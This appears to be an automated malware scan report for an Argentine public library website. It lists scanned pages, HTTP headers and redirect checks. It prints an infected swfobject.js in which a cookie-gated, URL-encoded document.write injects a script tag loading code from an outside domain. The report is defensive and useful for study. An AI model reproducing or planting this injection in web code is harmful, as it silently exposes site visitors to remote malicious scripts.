Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bibliotecaronco.com.ar
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bibliotecaronco.com.ar/ | 200 OK Content-Length: 7591 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hemerotecadeazul.com.ar ...[879 bytes skipped]... esheet" type="text/css"></link> <link href="styles/general2.css" rel="stylesheet" type="text/css" /> </head> <body class="fondo_body"> <div id="wrapper"> <div class="cont_horiz menu_sitios_ronco"> <a href="http://www.bibliotecaronco.com.ar" class="selected" title="Biblioteca Popular Bartolomé J. Ronco">Biblioteca Ronco</a> <a href="http://www.hemerotecadeazul.com.ar" title="Hemeroteca de Azul">Hemeroteca</a> <a href="http://www.museosquirru.com.ar" title="Museo Etnográfico y Archivo Histórico Enrique Squirru">Museo Enrique Squirru</a> <a href="http://www.casaroncoazul.com.ar" title="Casa de la familia Ronco">Casa Ronco</a> </div> <div id="borde" class="cont_horiz"> <div id="titular" class="cont_horiz"> <div id="fondo_titular"> <div id ...[3234 bytes skipped]... | ||
http://bibliotecaronco.com.ar/scripts/jquery-1.2.3.pack.js | 200 OK Content-Length: 29846 Content-Type: application/javascript | clean |
http://bibliotecaronco.com.ar/scripts/actionHandler.js | 200 OK Content-Length: 4884 Content-Type: application/javascript | clean |
http://bibliotecaronco.com.ar/scripts/swfobject.js | 200 OK Content-Length: 10643 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var b="undefined",Q="object",n="Shockwave Flash",p="ShockwaveFlash.ShockwaveFlash",P="application/x-shockwave-flash",m="SWFObjectExprInst",j=window,K=document,T=navigator,o=[],N=[],i=[],d=[],J,Z=null,M=null,l=null,e=false,A=false;var h=function(){var v=typeof K.getElementById!=b&&typeof K.getElementsByTagName!=b&&typeof K.createElement!=b,AC=[0,0,0],x=null;if(typeof T.plugins!=b&&typeof T.plugins[n]==Q){x=T.plugins[n].description;if(x&&!(t if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://smallpages.com.ar/Block/embed?k=20&v=1 | 500 Can't connect to smallpages.com.ar:80 (Bad hostname) Content-Length: 166 Content-Type: text/plain | clean |
http://smallpages.com.ar/test404page.js | 500 Can't connect to smallpages.com.ar:80 (Bad hostname) Content-Length: 166 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bibliotecaronco.com.ar
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 07 Oct 2014 07:24:30 GMT
Pragma: no-cache
Via: 1.1 varnish
Age: 0
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESS=2aa022fddcea040cab3045678b0af6c7; path=/
Set-Cookie2: WS_Tracker=424e8a2e.504d017014c58; path=/
X-Cache: MISS
X-Varnish: 269416085
GET / HTTP/1.1
Host: bibliotecaronco.com.ar
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 07 Oct 2014 07:24:30 GMT
Pragma: no-cache
Via: 1.1 varnish
Age: 0
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESS=2aa022fddcea040cab3045678b0af6c7; path=/
Set-Cookie2: WS_Tracker=424e8a2e.504d017014c58; path=/
X-Cache: MISS
X-Varnish: 269416085
Second query (visit from search engine):
GET / HTTP/1.1
Host: bibliotecaronco.com.ar
Referer: http://www.google.com/search?q=bibliotecaronco.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bibliotecaronco.com.ar
Referer: http://www.google.com/search?q=bibliotecaronco.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.